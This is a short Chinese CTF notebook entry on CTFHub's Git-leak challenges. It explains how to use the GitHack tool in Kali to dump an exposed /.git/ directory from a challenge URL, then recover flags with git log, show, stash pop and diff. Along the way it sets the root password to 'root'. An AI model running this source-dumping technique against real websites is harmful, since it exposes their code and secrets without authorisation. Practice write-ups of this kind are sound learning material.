CTF 技能树 LOG -GIT泄露 笔记
log
使用虚拟机kali操作
python2 安装
apt-get install python2进入root用户,下载克隆git hack库
git clone https://github.com/BugScanTeam/GitHacksudo passwd root 修改root 命名密码为root
切换登录 su root
终端进入home/kali/GitHack/
python GitHack.py http://XXX(替换url地址)/.git/
就产生一个新的 dist文件再目录内去找
在终端进入home/kali/GitHack/dist/上面文件夹(challenge-8c0c7140c664e0d3.sandbox.ctfhub.com_10800)目录内
使用git log
然后再打git show 就可以得到FLAG~!
Stash
继续做第二题 时候 我发现文件内又多了个GIThack 不影响 找对目录就可以了 用新的
python GitHack.py http://XXX(替换url地址)/.git/
一样产生 进入新的文件内
使用命令 git stash list
如何再 git stash pop
在home文件目录下 找到 txt 里面就是flag啦~
3.
index
同样
python2 GitHack.py http://XXX(替换url地址)/.git/
1.
文件夹找 直接就出来了 - - 无语~~
其他人说还可以在目录内打
git log 查看历史记录,然后使用 git diff进行比对,即可看到flag(你们直接尝试下吧~!)